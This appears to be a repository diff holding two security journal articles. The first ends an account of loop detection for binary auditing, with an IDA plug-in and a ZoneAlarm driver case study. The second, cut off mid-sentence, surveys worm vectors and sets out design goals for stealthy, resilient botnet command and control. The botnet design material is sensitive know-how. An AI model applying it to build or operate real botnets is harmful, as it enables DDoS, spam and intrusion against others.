http://www.cs.princeton.edu/courses/archive/spring03/cs320/notes/loops.pdf .
|
||||
Research on the optimization of loops has led scientists to classify various
|
||||
types of loops. There are two distinct categories to which any loop will
|
||||
belong. Either the loop will be an irreducible loop Irreducible loops are
|
||||
defined as "loops with multiple entry [points]"
|
||||
(http://portal.acm.org/citation.cfm?id=236114.236115) or a reducible loop
|
||||
Reducible loops are defined as "loops with one entry [point]"
|
||||
(http://portal.acm.org/citation.cfm?id=236114.236115). Given that there are
|
||||
two different distinct categories, it stands to reason that the two types of
|
||||
loops are detected in different fashions. Two popular papers on loop detection
|
||||
are Interval Finding Algorithm and Identifying Loops Using DJ Graphs. This
|
||||
document will cover the most widely accepted theory on loop detection.
|
||||
|
||||
|
||||
3.1) Natural Loop Detection
|
||||
|
||||
One of the most well known algorithms for loop detection is demonstrated in the
|
||||
book Compilers Principles, Techniques, and Tools by Alfred V. Aho, Ravi Sethi
|
||||
and Jeffrey D. Ullman. In this algorithm, the authors use a technique that
|
||||
consists of two components to find natural loops A natural loop "Has a single
|
||||
entry point. The header dominates all nodes in the loop."
|
||||
(http://www-2.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s03/public/lectures/L7_handouts.pdf
|
||||
all loops are not natural loops.
|
||||
|
||||
The first component of natural loop detection is to build a dominator tree out
|
||||
of the control flow graph (CFG). A dominator can be found when all paths to a
|
||||
given node have to go through another node. A control flow graph is essentially
|
||||
a map of code execution with directional information. The algorithm in the
|
||||
book calls for the finding of all the dominators in a CFG. Let's look at the
|
||||
actual algorithm.
|
||||
|
||||
Starting from the entry node, the algorithm needs to check if there is a path
|
||||
to the slave from the entry node. This path has to avoid the master node. If
|
||||
it is possible to get to the slave node without touching the master node, it
|
||||
can be determined that the master node does not dominate the slave node. If it
|
||||
is not possible to get to the slave node, it is determined that the master node
|
||||
does dominate the slave. To implement this routine the user would call the
|
||||
is_path_to(ea_t from, ea_t to, ea_t avoid) function included in loopdetection.cpp.
|
||||
This function will essentially check to see if there is a path from the
|
||||
parameter from that can get to the parameter to, and will avoid the node
|
||||
specified in avoid. Figure illustrates this algorithm.
|
||||
|
||||
As the reader can see from Figure 1, there is a loop in this CFG. Let B to C
|
||||
to D be the path of nodes that create a loop, it will be represented as
|
||||
B->C->D. There is also another loop from nodes B->D. Using the algorithm
|
||||
described above it is possible to verify which of these nodes is involved in
|
||||
the natural loop. The first question to ask is if the flow of the program can
|
||||
get from A to D while avoiding B. As the reader can see, it is impossible in
|
||||
this case to get to D avoiding B. As such, a call to the is_path_to function
|
||||
will tell the user that B Dominates D. This can be represented as B Dom D, and
|
||||
B Dom C. This is due to the fact that there is no way to reach C or D without
|
||||
going through B. One question that might be asked is how exactly does this
|
||||
demonstrate a loop? The answer is that, in fact, it doesn't. The second
|
||||
component of the natural loop detection checks to see if there is a link, or
|
||||
backedge, from D to B that would allow the flow of the program to return to
|
||||
node B to complete the loop. In the case of B->D there exists a backedge that
|
||||
does complete the loop.
|
||||
|
||||
|
||||
3.2) Problems with Natural Loop Detection
|
||||
|
||||
There is a very big problem with natural loops. The problem is with the
|
||||
natural loop definition which is ``a single entry point whose header dominates
|
||||
all the nodes in the loop''. Natural loop detection does not deal with
|
||||
irreducible loops, as defined previously. This problem can be demonstrated in
|
||||
figure
|
||||
|
||||
As the reader can see both B and D are entry points into C. Also neither D nor
|
||||
B dominates C. This throws a huge wrench into the algorithm and makes it only
|
||||
able to pick up loops that fall under the specification of a natural loop or
|
||||
reducible loop It is important to note that it is next that it is next to
|
||||
impossible to reproduce
|
||||
|
||||
|
||||
4) A Different Approach to Loop Detection
|
||||
|
||||
The reader has seen how to detect dominators within a CFG and how to use that
|
||||
as a component to find natural loops. The previous chapter described why
|
||||
natural loop detection was flawed when trying to detect irreducible loops. For
|
||||
binary auditing, the tool will need to be able to pick up all loops and then
|
||||
let the user deduce whether or not the loops are interesting. This chapter
|
||||
will introduce the loop algorithm used in the IDA plug-in to detect loops.
|
||||
|
||||
To come up with an algorithm that was robust enough to detect both loops in the
|
||||
irreducible and reducible loop categories, the author decided to modify the
|
||||
previous definition of a natural loop. The new definition reads "a loop can
|
||||
have multiple entry points and at least one link that creates a cycle." This
|
||||
definition avoids the use of dominators to detect loops in the CFG.
|
||||
|
||||
The way this alternative algorithm works is by first making a call to the
|
||||
is_reference_to(ea_t to, ea_t ref) function. The function is_reference_to will
|
||||
determine if there is a reference from the ea_t specified by ref to the
|
||||
parameter to. This check within the loop detection algorithm determines if
|
||||
there is a backedge or link that would complete a loop. The reason this check
|
||||
is done first is for speed. If there is no reference that would complete a
|
||||
loop then there is no reason to call is_path_to, thus preventing unnecessary
|
||||
calculations. However, if there is a link or backedge, a call to the
|
||||
overloaded function is_path_to(ea_t from, ea_t to) is used to determine if the
|
||||
nodes that are being examined can even reach each other. The is_path_to function
|
||||
simulates all possible code execution conditions by following all possible
|
||||
edges to determine if the flow of execution could ever reach parameter to when
|
||||
starting at parameter from. The function is_path_to(ea_t from, ea_t to) returns
|
||||
one (true) if there is indeed a path going from from to to. With both of these
|
||||
functions returning one, it can be deduced that these nodes are involved in the
|
||||
loop.
|
||||
|
||||
|
||||
4.1) Problems with new approach
|
||||
|
||||
In every algorithm there can exists small problems, that make the algorithm far
|
||||
from optimal. This problem applies to the new approach presented above. The
|
||||
algorithm presented above has not been optimized for performance. The algorithm
|
||||
runs in a time of O(N2), which carries quite a load if there are more than 600
|
||||
or so nodes.
|
||||
|
||||
The reason that the algorithm is so time consuming is that instead of
|
||||
implementing a Breadth First Search (BFS), a Depth First Search (DFS) was
|
||||
implemented, in the is_path_to function which computes all possible paths to and
|
||||
from a given node. Depth First Search is much more expensive than Breadth First
|
||||
Search, and because of that the algorithm may in some rare cases suffer. If
|
||||
the reader is interested in how to implement a more efficient algorithm for
|
||||
finding the dominators, the reader should check out Compiler Design
|
||||
Implementation by Steven S. Muchnick.
|
||||
|
||||
|
||||
It should be noted that in future of this plug-in there will be optimizations
|
||||
made to the code. The optimizations will specifically deal new implementations
|
||||
of a Breadth First Search instead of the Depth First Search, as well as other
|
||||
small optimizations.
|
||||
|
||||
|
||||
5) Loop Detection Using IDA Plug-ins
|
||||
|
||||
In every algorithm and theory there exists small problems. It is important to
|
||||
understand the algorithm presented
|
||||
|
||||
The plug-in described in this document uses the Function Analyzer Class
|
||||
(functionanalyzer) that was developed by Pedram Amini
|
||||
(http://labs.idefense.com) as the base class. The Loop Detection
|
||||
(loopdetection) class uses inheritance to glean its attributes from Function
|
||||
Analyzer. The reason inheritance is used is primarily for ease of development.
|
||||
Inheritance is also used so that instead of having to re-add functions to a new
|
||||
version of Function Analyzer, the user only has to replace the old file. The
|
||||
final reason inheritance is used is for code conformity, which is accomplished
|
||||
by creating virtual functions. These virtual functions allow the user to
|
||||
override methods that are implemented in the Function Analyzer. This means
|
||||
that if a user understands the structure of function analyzer, they should not
|
||||
have a hard time understanding loop detections structure.
|
||||
|
||||
|
||||
5.1) Plug-in Usage
|
||||
|
||||
To best utilize this plug-in the user needs to understand its features and
|
||||
capabilities. When a user runs the plug-in they will be prompted with a window
|
||||
that is shown in figure . Each of the options shown in figure are described
|
||||
individually.
|
||||
|
||||
|
||||
Graph Loop
|
||||
|
||||
This feature will visualize the loops, marking the entry of a loop with green
|
||||
border, the exit of a loop with a red border and a loop node with a yellow
|
||||
border. Highlight Function Calls This option allows the user to highlight the
|
||||
background of any function call made within the loop. The highlighting is done
|
||||
within IDA View.
|
||||
|
||||
|
||||
Output Stack Information
|
||||
|
||||
This is a feature that is only enabled with the graph loop option. When this
|
||||
option is enabled the graph will contain information about the stack of the
|
||||
function including the variables name, whether or not it is an argument, and
|
||||
the size of the variable. This option is a great feature for static auditing.
|
||||
|
||||
|
||||
Highlight Code
|
||||
|
||||
This option is very similar to Highlight Function except instead of just
|
||||
highlighting function calls within loops it will highlight all the code that is
|
||||
executed within the loops. This makes it easier to read the loops in IDA View
|
||||
|
||||
|
||||
Verbose Output
|
||||
|
||||
This feature allows the user to see how the program is working and will give
|
||||
more information about what the plug-in is doing.
|
||||
|
||||
|
||||
Auto Commenting
|
||||
|
||||
This option adds comments to loops nodes, such as where the loop begins, where
|
||||
it exits, and other useful information so that the user doesn't have to
|
||||
continually look at the graph.
|
||||
|
||||
|
||||
All Loops Highlighting of Functions
|
||||
|
||||
This feature will find every loop within the IDA database. It will then
|
||||
highlight any call to any function within a loop. The highlighting is done
|
||||
within the IDA View making navigation of code easier.
|
||||
|
||||
|
||||
All Loops Highlighting of Code
|
||||
|
||||
This option will find every loop within the database. It will then highlight
|
||||
all segments of code involved in a loop. The highlighting of code will allow
|
||||
for easier navigation of code within the IDA View.
|
||||
|
||||
|
||||
Natural Loops
|
||||
|
||||
This detection feature allows the user to only see natural loops. It may not
|
||||
pick up all loops but is an educational implementation of the previously
|
||||
discussed algorithm.
|
||||
|
||||
|
||||
Recursive Function Calls
|
||||
|
||||
This detection option will allow the user to see where recursive function calls
|
||||
are located.
|
||||
|
||||
|
||||
5.2) Known Issues
|
||||
|
||||
There a couple of known issues with this plug-in. It does not deal with rep*
|
||||
instructions, nor does it deal with mov** instructions that might result in
|
||||
copied buffers. Future versions will deal with these instructions, but since
|
||||
it is open-sourced the user can make changes as they see fit. Another issue is
|
||||
that of ``no-interest''. By this the author means detecting loops that aren't
|
||||
of interest or don't pose a security risk. These loops, for example, may be
|
||||
just counting loops that don't write memory. Halvar Flake describes this topic
|
||||
in his talk that was given at Blackhat Windows 2004. Feel free to read his
|
||||
paper and make changes accordingly. The author will also update the plug-in
|
||||
with these options at a later date.
|
||||
|
||||
|
||||
5.3) Case Study: Zone Alarm
|
||||
|
||||
For a case study the author chose Zone Alarm's vsdatant.sys driver. This
|
||||
driver does a lot of the dirty work for Zone Alarm such as packet filtering,
|
||||
application monitoring, and other kernel level duties. Some may wonder why it
|
||||
would be worthwhile to find loops in a driver. In Zone Alarm's case, the user
|
||||
can hope to find miscalculations in lengths where they didn't convert a signed
|
||||
to unsigned value properly and therefore may cause an overflow when looping.
|
||||
Anytime an application takes data in remotely that may be type-casted at some
|
||||
point, there is always a great chance for loops that overflow their bounds.
|
||||
|
||||
When analyzing the Zone Alarm driver the user needs to select certain options
|
||||
to get a better idea of what is going on with loops. First, the user should
|
||||
select verbose output and All Loops Highlighting of Functions to see if there
|
||||
are any dangerous function calls within the loop. This is illustrated in
|
||||
figure .
|
||||
|
||||
After running through the loop detection phase, some interesting results are
|
||||
found that are shown in figure .
|
||||
|
||||
Visiting the address 0x00011a21 in IDA shows the loop. To begin, the reader
|
||||
will need to find the loop's entry point, which is at:
|
||||
|
||||
.text:00011A1E jz short loc_11A27
|
||||
|
||||
At the loop's entry point, the reader will notice:
|
||||
|
||||
.text:00011A27 push 206B6444h ; Tag
|
||||
.text:00011A2C push edi ; NumberOfBytes
|
||||
.text:00011A2D push 1 ; PoolType
|
||||
.text:00011A2F call ebp ;ExAllocatePoolWithTag
|
||||
|
||||
At this point, the reader can see that every time the loop passes through its
|
||||
entry point it will allocate memory. To determine if the attacker can cause a
|
||||
double free error, further investigation is needed.
|
||||
|
||||
.text:00011A31 mov esi, eax
|
||||
.text:00011A33 test esi, esi
|
||||
.text:00011A35 jz short loc_11A8F
|
||||
|
||||
If the memory allocation within the loop fails, the loop terminates correctly.
|
||||
The next call in the loop is to ZwQuerySystemInformation which tries to acquire
|
||||
the SystemProcessAndThreadsInformation.
|
||||
|
||||
.text:00011A46 mov eax, [esp+14h+var_4]
|
||||
.text:00011A4A add edi, edi
|
||||
.text:00011A4C inc eax
|
||||
.text:00011A4D cmp eax, 0Fh
|
||||
.text:00011A50 mov [esp+14h+var_4], eax
|
||||
.text:00011A54 jl short loc_11A1C
|
||||
|
||||
This part of the loop is quite un-interesting. In this segment the code
|
||||
increments a counter in eax until eax is greater than 15. It is obvious that
|
||||
it is not possible to cause a double free error in this case because the user
|
||||
has no control over the loop condition or data within the loop. This ends the
|
||||
investigation into a possible double free error.
|
||||
|
||||
Above is a good example of how to analyze loops that may be of interest. With
|
||||
all binary analysis it is important to not only identify dangerous function
|
||||
calls but to also identify if the attacker can control data that might be
|
||||
manipulated or referenced within a loop.
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
During the course of this paper, the reader has had a chance to learn about the
|
||||
different types of loops and some of the method of detecting them. The reader
|
||||
has also gotten an in-depth view of the new IDA plug-in released with this
|
||||
article. Hopefully now when the reader sees a loop, whether in code or binary,
|
||||
the reader can explore the loop and determine if it is a security risk or not.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Tarjan, R. E. 1974. Testing flow graph reducibility. J
|
||||
Comput. Syst. Sci. 9, 355-365.
|
||||
|
||||
Sreedhar, Vugranam, Guang Gao, Yong-Fong Lee. Identifying
|
||||
loops using DJ graphs.
|
||||
http://portal.acm.org/citation.cfm?id=236114.236115
|
||||
|
||||
Flake, Halvar. Automated Reverse Engineering.
|
||||
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-flake.pdf
|
572
uninformed/1.5.txt
Normal file
572
uninformed/1.5.txt
Normal file
|
@ -0,0 +1,572 @@
|
|||
Social Zombies - Aspects of Trojan Networks
|
||||
May, 2005
|
||||
warlord
|
||||
warlord / nologin.org
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
|
||||
While I'm sitting here and writing this article, my firewall is
|
||||
getting hammered by lots and lots of packets that I never asked for.
|
||||
How come? In the last couple of years we saw the internet grow into
|
||||
a dangerous place for the uninitiated, with worms and viruses
|
||||
looming almost everywhere, often times infecting systems without
|
||||
user interaction. This article will focus on the subclass of malware
|
||||
commonly referred to as worms, and introduce some new ideas to the
|
||||
concept of worm networks.
|
||||
|
||||
2) Worm Infection Vectors
|
||||
|
||||
|
||||
The worms around today can mostly be put into one the four
|
||||
categories discussed in the following sections.
|
||||
|
||||
2.1) Mail
|
||||
|
||||
The mail worm is the simplest type of worm. It's primary
|
||||
mode of propagation is through social engineering. By sending large
|
||||
quantities of mail with content that deceives people and/or triggers
|
||||
their curiosity, recipients are tricked into running an attached
|
||||
program. Once executed, the program will send out copies of itself
|
||||
via email to recipients found in the victims address book. This type
|
||||
of worm is usually stopped quickly when antivirus companies update
|
||||
their signature files, and mail servers running those AV products
|
||||
start filtering the worm mails out. Users, in general, are becoming
|
||||
more and more aware of this type of malware, and many won't run
|
||||
attachments sent in mail anymore. Regardless, this method of
|
||||
infection still manages to be successful.
|
||||
|
||||
|
||||
2.2) Browser
|
||||
|
||||
Browser-based worms, which primarily work against Internet Explorer,
|
||||
make use of vulnerabilities that exist in web-browsers. What
|
||||
generally happens is that when a users visits a malicious website,
|
||||
an exploit will make Internet Explorer download and execute code. As
|
||||
there are well known vulnerabilities in Internet Explorer at all
|
||||
times that are not yet fixed, the bad guys usually have a couple of
|
||||
days or weeks to spread their code. Of course, the infection rate
|
||||
heavily depends on the number of visitors on the website hosting the
|
||||
exploit. One approach that has been used in the past to gain access
|
||||
to a wider 'audience' involved sending mail to thousands of users in
|
||||
an attempt to get the users to visit a malicious website. Another
|
||||
approach involved hacking advertisement companies and changing their
|
||||
content in order to make them serve exploits and malware on high
|
||||
profile sites.
|
||||
|
||||
|
||||
2.3) Peer to Peer
|
||||
|
||||
The peer to peer worm is quite similar to the mail worm; it's all
|
||||
about social engineering. Users hunting for the latest mp3s or
|
||||
pictures of their most beloved celebrity find similarly named
|
||||
programs and scripts, trying to deceive the user to download and
|
||||
execute them. Once active on the users system, the malcode will make
|
||||
sure it's being hosted by the users p2p application to spread
|
||||
further. Even if downloaded, host based anti-virus scanners with
|
||||
recent signatures will catch most of these programs before they can
|
||||
be run.
|
||||
|
||||
|
||||
2.4) Active
|
||||
|
||||
This one is the most dangerous worm, as it doesn't require any sort
|
||||
of user interaction at all. It also requires the highest level of
|
||||
skill to write. Active worms spread by scanning the internet for one
|
||||
or more types of vulnerabilities. Once a vulnerable target is
|
||||
found, an exploit attempt is made that, if successful, results in
|
||||
the uploading of the worm to the attacked site where propagation can
|
||||
continue in the same form. These worms are usually spotted first by
|
||||
an increasing number of hosts scanning the internet, most often
|
||||
scanning for a single port. These worms also usually exploit
|
||||
weaknesses that are well-known to the public for hours, days, weeks
|
||||
or months. Examples of this type of worm include the Wank worm,
|
||||
Code Red, Sadmind, SQL Slammer, Blaster, Sasser and others. As the
|
||||
use of firewalls and NAT routers increases, and as anti-exploit
|
||||
techniques like the one employed by Windows XP SP2 become more
|
||||
common, these worms will find less hosts to infect. To this point,
|
||||
from the time of this writing, it's been a while since the last big
|
||||
active worm hit the net.
|
||||
|
||||
|
||||
Other active infection vectors include code spreading via unset or
|
||||
weak passwords on CIFS Common Internet File System. The
|
||||
protocol used to exchange data between Windows hosts via network
|
||||
shares. shares, IRC and instant messaging networks, Usenet, and
|
||||
virtually every other data exchange protocol.
|
||||
|
||||
3) Motives
|
||||
|
||||
3.1) Ego
|
||||
|
||||
Media attention often is a major motivation behind a worm. Coders
|
||||
bolstering their ego by seeing reports on their worm on major sites
|
||||
on the internet as well as tv news and newspapers with paniced
|
||||
warnings of the latest doomsday threat which may take down the
|
||||
planet and result in a 'Digital Pearl Harbor' seems
|
||||
to be quite often the case. Huge media attention usually also means
|
||||
huge law enforcement attention, and big efforts will be made to
|
||||
catch the perpetrator. Though especially wide open (public) WIFI
|
||||
networks can make it quite difficult to catch the perpetrator by
|
||||
technological means, people boasting on IRC and, as in the case of
|
||||
Sasser, bounties, can quickly result in the worm's author being
|
||||
taken into custody.
|
||||
|
||||
|
||||
3.2) DDoS
|
||||
|
||||
The reason for a DDoS botnet is usually either the wish to have
|
||||
enough firepower to virtually shoot people/sites/organizations off
|
||||
the net, or extortion, or a combination of both. The extortion of
|
||||
gambling websites before big sports events is just one example of
|
||||
many cases of extortion involving DDoS. The attacker usually takes
|
||||
the website down for a couple of hours to demonstrate his ability to
|
||||
do so whenever it pleases him, and sends a mail to the owner of the
|
||||
website, asking for money to keep the firepower away from his site.
|
||||
This sort of business model is well known for millenia, and merely
|
||||
found new applications online.
|
||||
|
||||
|
||||
3.3) Spamming
|
||||
|
||||
This one is also about money in the end. Infected machines are
|
||||
(ab)used as spam zombies. Each machine sends their master's
|
||||
unsolicited mail to lots and lots of unwilling recipients. The
|
||||
owners of these systems usually offer their services to the spam
|
||||
industry and thus make money of it.
|
||||
|
||||
|
||||
3.4) Adware
|
||||
|
||||
Yet another reason involving money. Just like on TV and Google,
|
||||
advertisements can be sold. The more people seeing the
|
||||
advertisement, the more money can be requested from the people that
|
||||
pay for their slogan to be displayed on some end users Windows. (Of
|
||||
course, it could be Linux and MacOS too, but, face it, no adware
|
||||
attacks those)
|
||||
|
||||
|
||||
3.5) Hacking
|
||||
|
||||
A worm that infects and backdoors a couple thousand hosts is a great
|
||||
way to quickly and easily obtain data from those systems. Examples
|
||||
of data that may be worth stealing includes accounts for online
|
||||
games, credit card numbers, personal information that can be used in
|
||||
identity theft scams, and more. There has even been a report that
|
||||
items of online games were being stolen to sell those later on
|
||||
E-bay. Already having compromised one machine, enhancing the
|
||||
influence into some network can be much easier of course. Take for
|
||||
example the case of a heavily firewalled company. A hacker can't get
|
||||
inside using an active approach, but notices that one of his malware
|
||||
serving websites infected a host within that network. Using a
|
||||
connect-back approach, where the infected node connects to the
|
||||
attacker, a can tunnel can be built through the firewall thereby
|
||||
allowing the attacker to reach the internal network.
|
||||
|
||||
4) Botnets
|
||||
|
||||
While I did mention DDoS and spam as reasons for infection already,
|
||||
what I left out so far was the infrastructure of hundreds or
|
||||
thousands of compromised machines, which is usually called a
|
||||
botnet. Once a worm has infected lots of systems, an
|
||||
attacker needs some way to control his zombies. Most often the nodes
|
||||
are made to connect to an IRC server and join a (password protected)
|
||||
secret channel. Depending on the malware in use, the attacker can
|
||||
usually command single or all nodes sitting on the channel to, for
|
||||
example, DDoS a host into oblivion, look for game CD keys and dump
|
||||
those into the channel, install additional software on the infected
|
||||
machines, or do a whole lot of other operations. While such an
|
||||
approach may be quite effective, it has several shortcomings.
|
||||
|
||||
- IRC is a plaintext protocol.
|
||||
|
||||
Unless every node builds an SSL tunnel to an SSL-capable IRCD,
|
||||
everything that goes on in the channel will be sent from the IRCD to
|
||||
all nodes connected, which means that someone sniffing from an
|
||||
infected honeypot can see everything going on in the channel,
|
||||
including commands and passwords to control the botnet. Such a
|
||||
weakness allows botnets to be stolen or destroyed (f.ex. by issuing
|
||||
a command to make them connect to a new IRCD which is on IP
|
||||
127.0.0.1).
|
||||
|
||||
- It's a single point of failure.
|
||||
|
||||
What if the IRCD goes down because some victim contacted the admin
|
||||
of the IRC server? On top of this, an IRC Op (a IRC administrator)
|
||||
could render the channel inaccessible. If an attacker is left
|
||||
without a way to communicate with all of the zombie hosts, they
|
||||
become useless.
|
||||
|
||||
A way around this dilemma is to make use of dynamic DNS sites like
|
||||
www.dyndns.org. Instead of making the zombies connect to
|
||||
irc.somehost.com, the attacker can install a dyndns client which
|
||||
then allows drones to reference a hostname that can be directed to a
|
||||
new address by the attacker. This allows the attacker to migrate
|
||||
zombies from one IRC server to the next without issue. Though this
|
||||
solves the problem of reliability, IRC should not be considered
|
||||
secure enough to operate a botnet successfully.
|
||||
|
||||
|
||||
The question, then, is what is a better solution? It seems the
|
||||
author of the trojan Phatbot already tried to find a way
|
||||
around this problem. His approach was to include peer to peer
|
||||
functionality in his code. He ripped the code of the P2P project
|
||||
``Waste'' and incorporated it into his creation. The problem was,
|
||||
though, that Waste itself didn't include an easy way to exchange
|
||||
cryptographic keys that are required to successfully operate the
|
||||
network, and, as such, neither did Phatbot. The author is not aware
|
||||
of any case where Phatbot's P2P functionality was actually used.
|
||||
Then again, considering people won't run around telling everyone
|
||||
about it (well, not all of them at least), it's possible that such a
|
||||
case is just not publicly known.
|
||||
|
||||
|
||||
To keep a botnet up and running, it requires reliability,
|
||||
authentication, secrecy, encryption and scalability. How can all of
|
||||
those goals be achieved? What would the basic functionality of a
|
||||
perfect botnet require? Consider the following points:
|
||||
|
||||
- An easy way to quickly send commands to all nodes
|
||||
- Untraceability of the source IP address of a command
|
||||
- Impossibile to judge from an intercepted command packet which node it was
|
||||
addressed to
|
||||
- Authentication schemes to make sure only authorized personnel operate the
|
||||
zombie network
|
||||
- Encryption to conceal communication
|
||||
- Safe software upgrade mechanisms to allow for functionality enhancements
|
||||
- Containment; so that a single compromised node doesn't endanger the entire
|
||||
network
|
||||
- Reliability; to make sure the network is still up and running when most of
|
||||
its nodes have gone
|
||||
- Stealthiness on the infected host as well as on the network
|
||||
|
||||
At this point one should distinguish between unlinked and
|
||||
linked, or passive, botnets. Unlinked means each node is on
|
||||
its own. The nodes poll some central resource for information.
|
||||
Information can include commands to download software updates, to
|
||||
execute a program at a certain time, or the order a DDoS on a given
|
||||
target machine. A linked botnet means the nodes don't do anything by
|
||||
themselves but wait for command packets instead. Both approaches
|
||||
have advantages and disadvantages. While a linked botnet can react
|
||||
faster and may be more stealthy considering the fact that it doesn't
|
||||
build up periodic network connections to look out for commands, it
|
||||
also won't work for infected nodes sitting behind firewalls. Those
|
||||
nodes may be able to reach a website to look for commands, which
|
||||
means an unlinked approach would work for them, but command packets
|
||||
like in the linked approach won't reach them, as the firewall will
|
||||
filter those out. Also, consider the case of trying to build up a
|
||||
botnet with the next Windows worm. Infected Windows machines are
|
||||
generally home users with dynamic IP addresses. End-user machines
|
||||
change IPs regularly or are turned off because the owner is at work
|
||||
or on a hunting weekend. Good luck trying to keep an up-to-date list
|
||||
of infected IPs. So basically, depending on the purpose of the
|
||||
botnet, one needs to decide which approach to use. A combination of
|
||||
both might be best. The nodes could, for example, poll a resource of
|
||||
information once a day, where commands that don't require immediate
|
||||
attention are waiting for them. On the other hand if there's
|
||||
something urgent, sending command packets to certain nodes could
|
||||
still be an option. Imagine a sort of unlinked botnet. No node knows
|
||||
about another node and nor does it ever contact one of its brothers,
|
||||
which perfectly achieves our goal of containment. These nodes
|
||||
periodically contact what the author has labeled a resource
|
||||
of information to retrieve their latest orders. What could such a
|
||||
resource look like?
|
||||
|
||||
The following attributes are desirable:
|
||||
|
||||
- It shouldn't be a single point for failure, like a single host that makes
|
||||
the whole system break down once it's removed.
|
||||
- It should be highly anonymous, meaning connecting there shouldn't be
|
||||
suspicious activity. To the contrary, the more people requesting information
|
||||
from it the better. This way the nodes' connections would vanish in the
|
||||
masses.
|
||||
- The system shouldn't be owned by the botnet master. Anonymity is one of the
|
||||
botnet's primary goals after all.
|
||||
- It should be easy to post messages there, so that commands to the botnet can
|
||||
be sent easily.
|
||||
|
||||
There are several options to achieve these goals. It could be:
|
||||
|
||||
- Usenet: Messages posted to a large newsgroup which contain
|
||||
steganographically hidden commands that are cryptographically signed
|
||||
achieves all of the above mentioned goals.
|
||||
- P2P networks: The nodes link to a server once in a while and, like hundreds
|
||||
of thousands of other people, search for a certain term (``xxx''), and find
|
||||
command files. File size could be an indicator for the nodes that a certain
|
||||
file may be a command file.
|
||||
- The Web itself: This one would potentially be slow, but of course it's also
|
||||
possible to setup a website that includes commands, and register that site
|
||||
with a search engine. To find said site, the zombies would connect to the
|
||||
search engine and submit a keyword. A special title of the website would
|
||||
make it possible to identify the right page between thousands of other hits
|
||||
on the keyword, without visiting each of them.
|
||||
|
||||
|
||||
|
||||
Using those methods, it would be possible to administer even large
|
||||
botnets without even having to know the IP adresses of the nodes.
|
||||
The ``distance'' between botnet owner and botnet drone would be as
|
||||
large as possible since there would be no direct connection between
|
||||
the two. These approaches also face several problems, though:
|
||||
|
||||
|
||||
How would the botnet master determine the number of infected hosts
|
||||
that are up and running? Only in the case of the website would
|
||||
estimation of the number of nodes be possible by inspecting the
|
||||
access logs, even logging were to be enabled. In the case of the
|
||||
Usenet approach a command of ``DDoS Ebay/Yahoo/Amazon/CNN'' might
|
||||
just reach the last 5 remaining hosts, and the attacker would only
|
||||
be left with the knowledge that it somehow didn't work. The problem
|
||||
is, however, that the attacker would not know the number of zombies
|
||||
that would actually take part in the attack. The same problem occurs
|
||||
with the type and location of the infected hosts. Some might be high
|
||||
profile, such as those connecting from big corporations, game
|
||||
developers, or financial institutions. The attacker might be
|
||||
interested in abusing those for something other than Spam and DDoS,
|
||||
if he knew about them in particular. If the attacker wants to bounce
|
||||
his connections over 5 of his compromised nodes to make sure he
|
||||
can't be traced, then it is required that he be able to communicate
|
||||
with 5 nodes only and that he must know address information about
|
||||
the nodes. If the attacker doesn't have a clue which IP addresses
|
||||
his nodes have, how can he tell 5 of them where to connect to?
|
||||
Besides the obvious problem of timing, of course. If the nodes poll
|
||||
for a new command file once every 24 hours, he'd have to wait 24
|
||||
hours in the worst case until the last node finds out it's supposed
|
||||
to bind a port and forward the connection to somewhere else.
|
||||
|
||||
|
||||
4.1) The Linked Network
|
||||
|
||||
Though I called this approach a passive network, as the nodes idle
|
||||
and wait for commands to come to them, this type of botnet is in
|
||||
fact quite active. The mechanisms described now will not (easily)
|
||||
work when most of the nodes are on dynamic IP addresses. It is thus
|
||||
more interesting for nodes installed after exploiting some kind of
|
||||
server software. Of course, while not solving the uptime problem, a
|
||||
rogue dyndns account can always give a dynamic IP a static hostname.
|
||||
|
||||
|
||||
|
||||
This kind of network focuses on all of its nodes forming some kind
|
||||
of self-organizing peer to peer network. A node that infects some
|
||||
other host can send over the botnet program and make the new host
|
||||
link to itself, thus becoming that node's parent. This technique can
|
||||
make the infected hosts form a sort of tree structure over time, as
|
||||
each newly infected host tries to link to the infecting host.
|
||||
Updates, information, and commands can be transmitted using this
|
||||
worm network to reach each node, no matter which node it was sent
|
||||
from, as each node informs both child nodes as well as its parent
|
||||
nodes. In its early (or final) stages, a network of this type might
|
||||
look like this piece of ascii art:
|
||||
|
||||
Level
|
||||
0 N
|
||||
/ \
|
||||
1 N N
|
||||
/ \ /
|
||||
2 N N N
|
||||
|
||||
To make sure a 'successful' node that infects lots of hosts doesn't
|
||||
become the parent of all of those hosts, nodes must refuse link
|
||||
requests from child nodes after a certain number have been linked
|
||||
(say 5). The parent can instead in form the would-be child to link
|
||||
to one of its already established children instead. By keeping track
|
||||
of the number of nodes linked to each location in the tree, a parent
|
||||
can even try to keep the tree thats hierarchically below it well
|
||||
balanced. This way a certain node would know about its parent and up
|
||||
to 5 children, thus keeping the number of other hosts that someone
|
||||
who compromises a node rather low, while still making sure to have a
|
||||
network that's as effective as possible. Depending on the number of
|
||||
nodes in the entire network, the amount of children that may link to
|
||||
a parent node could be easily changed to make the network scale
|
||||
better. As each node may be some final link as well as a parent
|
||||
node, every host runs the same program. There's no need for special
|
||||
'client' and 'server' nodes.
|
||||
|
||||
|
||||
Whats the problem with a tree structure? Well, what if a parent
|
||||
fails? Say a node has 3 children, each having 2 children of its own.
|
||||
Now this node fails because the owner decides to reinstall the host.
|
||||
Are we left with 3 networks that can't communicate with each other
|
||||
any more? Not necessarily. While possibly giving a forensics expert
|
||||
information on additional hosts, to increase reliability each node
|
||||
has to know about at least one more upstream node that it can try to
|
||||
link to if its parent is gone. An ideal candidate could be the
|
||||
parent's parent. In order to make sure that all nodes are still
|
||||
linked to the network, a periodic (once a day) sort of ``ping''
|
||||
through the entire network has to happen in any case. By giving a
|
||||
child node the IP of its ``grandparent'', the direct parent of the
|
||||
child node always knows that the fail-over node, the one its kids
|
||||
will try to link to if it should fail, is still up and running.
|
||||
|
||||
|
||||
Though this may help to address the issue of parent death, another
|
||||
issue remains. If the topmost node fails, there are no more
|
||||
upstream nodes that the children could link to. Thats why in this
|
||||
case the children should have the ip of one(!) of its siblings as
|
||||
the fail-over address so that they can make this one the new top
|
||||
node in the case of a fail-over condition. Making use of the
|
||||
node-based ping, each node also knows how many of its children are
|
||||
still up and running. By including this number into the ping sent to
|
||||
the parent, the topmost node could always tell the number of linked
|
||||
